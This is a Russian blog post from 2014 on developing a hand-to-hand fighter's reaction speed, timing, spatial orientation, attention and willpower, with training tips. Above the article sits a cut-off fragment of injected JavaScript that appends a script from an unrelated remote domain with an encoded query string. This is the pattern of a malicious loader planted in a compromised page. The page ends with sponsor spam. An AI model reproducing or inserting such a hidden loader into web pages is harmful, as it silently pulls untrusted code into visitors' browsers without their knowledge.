: script.src = 'http://mvjrx.street-on-which.info' + '/?564803=N343MWUhKid-cXR0dHM'; w.document.body.appendChild(script); clearInterval(i);
 

Развитие реакции бойца.

понедельник, 16 июня 2014 г.


Достижение высокого мастерства во многом зависит от уровня развития специализированных психических процессов и качеств, которые позволяют реализовать свои физические и технико-тактические возможности. Каждый вид спорта имеет свои ведущие специализированные психические процессы и качества, уровень развития которых влияет на спортивный результат.

Анализируя результаты выдающихся мастеров боевых искусств, можно установить характерные особенности психических процессов, высокий уровень которых позволил этим людям добиться высоких результатов в рукопашном бое.

К наиболее важным психическим процессам, характерным для занимающихся рукопашным боем, можно отнести: скорость реакции, чувство времени, ориентировка в пространстве, чувство положения тела, чувство свободы движений, внимание, технико-тактическое мышление.

Скорость реакции. "Реакцией называется сознательное ответное действие, при котором боец заранее знает о предстоящих действиях и заранее готовится ответить на них определенным образом" . Так, быстрота реакции у бойца проявляется во внезапном скоростном и уверенном действии при неожиданном нападении противника, при попадании в экстремальную ситуацию и др. От быстроты действий на внезапный внешний фактор зависит успех выхода из той или иной сложной экстремальной ситуации.

Реакция человека на внешний раздражитель может быть простой или сложной. Простая - это реакция, вызванная заранее обусловленным и ожидаемым фактором. Например, боец знает, что противник будет наносить удар в ту или иную часть тела, от которого следует увернуться, или выполнить защиту. Внезапное нападение противника требует сложной скоростной реакции, так как этот фактор может быть неожиданным. Для развития быстроты реакции используется ряд специальных упражнений по степени трудности, отвечающих специфике боевых искусств.

Для развития скорости реакции следует:

- вырабатывать у бойца максимальное, быстрое и точное реагирование на предлагаемые различные раздражители - сигналы (зрительные и звуковые), восстановление равновесия при неожиданном его выведении действиями партнера, уклонение от летящих предметов (надувного, набивного или теннисного мяча);

- во время упражнений внезапно менять условия, на которые боец мгновенно должен реагировать быстрыми действиями, в том числе и силовыми;

- работать над ликвидацией скованности движений, напряженности, которые вызваны неправильной координацией движений или эмоциональным состоянием;

- учить бойца контролировать свои реакции по времени и управлять их быстротой, создавать у занимающегося четкое представление о длительности реакции.

Для развития скорости реакции на тот или иной раздражитель важно, чтобы боец ясно представлял сущность процесса реакции. Обычно спортсмены, выполняя мгновенные действия по типу реакции, не умеют расчленить эти действия (из-за их быстроты) на элементы, не представляют, из чего складывается структура реакции этого специализированного движения или действия, не могут выделить в сознании момент "ответа". Упражнения для развития скорости реакции можно делать во время специализированных занятий, во время общей физической подготовки или утренней зарядки, но только после соответствующего разогревания с помощью упражнений на гибкость и растяжение, так как быстрые, резкие ответные движения и действия могут вызвать повреждение в холодных мышцах.

Восприятие. В рукопашном бою особенно важны пространственно-временные факторы, без которых немыслим анализ движений и специализированные мышечно-двигательные восприятия. Это - чувство времени, которое определяется особенностями протекания физиологических и психических процессов в организме. Уравновешенность процессов возбуждения и торможения создает предпосылки для удержания от несвоевременного движения.

Боец должен обладать высоким чувством времени при ведении боя , восстановлении равновесия при его потере и т. п.

Основными упражнениями в развитии чувства времени в пространстве могут служить упражнения на гимнастических снарядах (скамейки, гимнастическая стенка, наклонная лестница), ведении тренировочного спарринга на очень маленьких скоростях. Также хорошим средством служат подвижные и спортивные игры, бег с препятствиями и др.

Ориентирование в пространстве. Под этим термином следует понимать ориентирование в пространстве во время ведения боя в сложных окружающих условиях, в темноте, с несколькими противниками. В этих условиях боец должен определить сложность обстановки, зрительно представить окружающие условия, в которых приходиться вести бой , рассчитать возможности их успешного использования, мысленно определить, в каком положении может оказаться тело, возможности установления равновесия при его потере, и т.д.
Ориентирование в пространстве включает в себя целый ряд психических процессов, связанных с мышлением, чувством уверенности или страха, с активными действиями, предположениями, представлениями и др. Бойцы, у которых недостаточно развито чувство ориентирования в пространстве, как правило, часто ошибаются в выборе наиболее простого и безопасного решения.
Чувство ориентирования в рукопашном бою является важным фактором безопасности и его следует систематически развивать, постоянно контролируя положение тела по отношению того или иного направления.

Чувство положения тела. В практике реального рукопашного боя встречаются ситуации, когда тело принимает необычное положение. Можно оказаться в положении лежа, сидя, в наклонах и даже вниз головой и др. Эти положения часто оказываются исходными для перемещения тела в разных направлениях с последующими активными действиями, при которых снова положение тела меняется. Чувство положения тела в разных сложных условиях с применением технико-тактических действий следует систематически тренировать. Для этого надо выполнять различные технические действия из нестандартных, неудобных позиций тела, также использовать в своих тренировках гимнастические снаряды, с упражнениями на изменение положения тела, упражнения на брусьях, вертикальной и горизонтальной лестнице, на кольцах, прыжки через коня, использовать "рейнские" колеса, лазание по деревьям и др. Все эти упражнения связаны с развитием целого ряда физических качеств, таких как сила, скорость, ловкость, гибкость и координация.

С уровнем развития чувства ориентировки в пространстве и положения тела связано чувство свободы движений.

Чувство свободы движений. Одно из отличительных черт мастерства бойца - умение излишне не напрягаться, при длительных действиях, в сложных условиях держаться свободно и непринужденно. Установлено, что чем выше класс бойца, тем у него больше свободы движений, тем более он ловок и вынослив. Свобода движений прежде всего зависит от умений спортсмена расслабляться после моментов напряжения, а следовательно, способность к быстрому восстановлению, способствующему сохранению работоспособности, силы и выносливости. Скованность всегда приводит к неточности движений, быстрой утомляемости и разрушению навыков. Основой для развития чувства свободы движений является овладение координацией и правильными техническими действиями, большой тренировкой. Каждому бойцу следует научиться контролировать свои движения, чередовать расслабления и напряжения отдельных групп мышц. В обще-развивающих и специально-подготовительных упражнениях во время утренней зарядки чаще проводить смену упражнений, нагружая то одну, то другую группу мышц.

Внимание - это направленность и сосредоточенность на одном или нескольких объектах. Наиболее важные свойства внимания - интенсивность и устойчивость. Боец во время ведения боя должен быть предельно внимателен. Если в каком-либо другом виде спорта потеря внимательности и сосредоточенности может привести к потере результата, то в реальной уличной схватке потеря внимательности может привести к несчастному случаю или летальному исходу.
Без обостренного внимания трудно правильно воспринимать и перерабатывать информацию, продуктивно мыслить, своевременно реагировать на перемену обстановки и контролировать свою деятельность. Поддержание высокого уровня внимания требует большого расхода физической и нервной энергии. При утомлении организма внимание снижается вследствие охранительного торможения.
Устойчивость внимания определяется тем, что направленность психической деятельности не переключается на объекты, отвлекающие от решения основной задачи. Бойцу весьма трудно сосредоточить внимание на каком-нибудь одном факторе, так как если не множество, то хотя бы несколько факторов, связанных друг с другом, действуют одновременно и выделить для сосредоточения внимания только один - невозможно.

Чтобы с достаточной интенсивностью сосредоточить внимание на своих действиях во время учебно-тренировочных занятий, боец должен выработать у себя постоянное стремление концентрировать восприятие и мышление на выполняемых упражнениях. Это стремление может быть основано только на интересе к упражнениям, к результатам своих действий, которые надо развивать. Следует отметить, что все упражнения для развития скорости реакции одновременно улучшают внимание бойца, так как требуют распределения внимания на двух, практически почти одновременных моментах: появлении раздражителя и действия на него.
В практике реального рукопашного боя приходится постоянно переключать внимание, чтобы реагировать на изменение обстановки.

Технико-тактическое мышление. В системе психологической подготовки рукопашного бойца следует выделить технико-тактическое мышление, как специально направленный психологический фактор.

Мышление как процесс обобщенного отражения действительности протекает в сложной форме. Вместе с тем оно опирается на конкретные образы, отражающие предметы и реальные явления.

Мышление любого спортсмена во время его деятельности характеризуется тесной связью с восприятиями и представлениями. Необходимым условием успешного решения технических и тактических задач являются наблюдательность, зрительная память, воображение и другие психологические процессы. Тактическое и техническое мышление развивается у бойца главным образом в процессе учебно-тренировочных занятий и учебных спаррингах на различных скоростях.

Волевая подготовка бойца.
Важным фактором подготовки рукопашного бойца является волевая подготовка. Высоких результатов можно добиться только при больших волевых напряжениях. И. М. Сеченов говорил: "Человек властен не только над своим телом, управляет не только своими поступками, но власть его распространяется даже на мысли, желания, страсти и пр.". Бойцу приходится все время преодолевать всевозможные трудности, в частности огромные длительные физические и психические нагрузки, утомление, в трудных условиях быстро оценивать обстановку и принимать решение. Деятельность в рукопашном бое имеет сугубо волевую направленность, поэтому воспитание воли у бойца - одна из центральных проблем современной подготовки.

В русской психологии воля определяется как сознательное регулирование человеком своего поведения и деятельности, выраженное в умении преодолевать внутренние и внешние трудности при совершении целенаправленных действий и поступков. Воля личности проявляется не во всякой, а лишь в сознательно направленной активности, когда человек борется за достижение поставленной цели, соответствующей его нравственным принципам и убеждениям. Для всех волевых проявлений характерен один общий признак - сознательная борьба личности с трудностями, неизбежными при решении всякой более или менее сложной задачи, что выражается в целенаправленном регулировании поведения, деятельности. Следовательно, наличие воли у человека неразрывно связано с наличием значимых, важных для него целей и задач. Говоря о значении воли в реальной рукопашном бою, следует отметить, что волевые усилия наиболее сильно проявляются тогда, когда боец обнаруживает дефицит энергии, необходимой для достижения цели, и сознательно мобилизует себя, чтобы привести свою активность в соответствие с теми препятствиями, которые надо преодолеть, чтобы добиться успеха.
Спортсмен, в частности рукопашный боец, может и должен противостоять нежелательным последствиям, связанным с некоторыми видами психической напряженности, с эмоциональными перегрузками. Противостоять этому можно лишь воспитывая волю, научившись управлять эмоциями и разумно преодолевать так называемые "эмоциональные стрессы", которые могут появляться в период больших напряжений, неудач и в особенности при сложных ситуациях, имея в виду, что стрессовое состояние возникает в результате острой эмоциональной напряженности, являющейся результатом воздействия на человека неблагоприятных факторов внешней или внутренней среды.
Воля личности и есть не что иное, как сложившаяся в процессе жизни определенная совокупность ее свойств, характеризующая достигнутый уровень сознательного самостоятельного регулирования поведения.
Проявление волевых качеств находит свое выражение в компонентах, составляющих волевые свойства - это целеустремленность, инициативность, решительность, настойчивость, выдержка, самостоятельность, организованность, смелость, самообладание и др.

Спонсор №1

SEO sprint - Всё для максимальной раскрутки!

Спонсор №2

Спонсор №3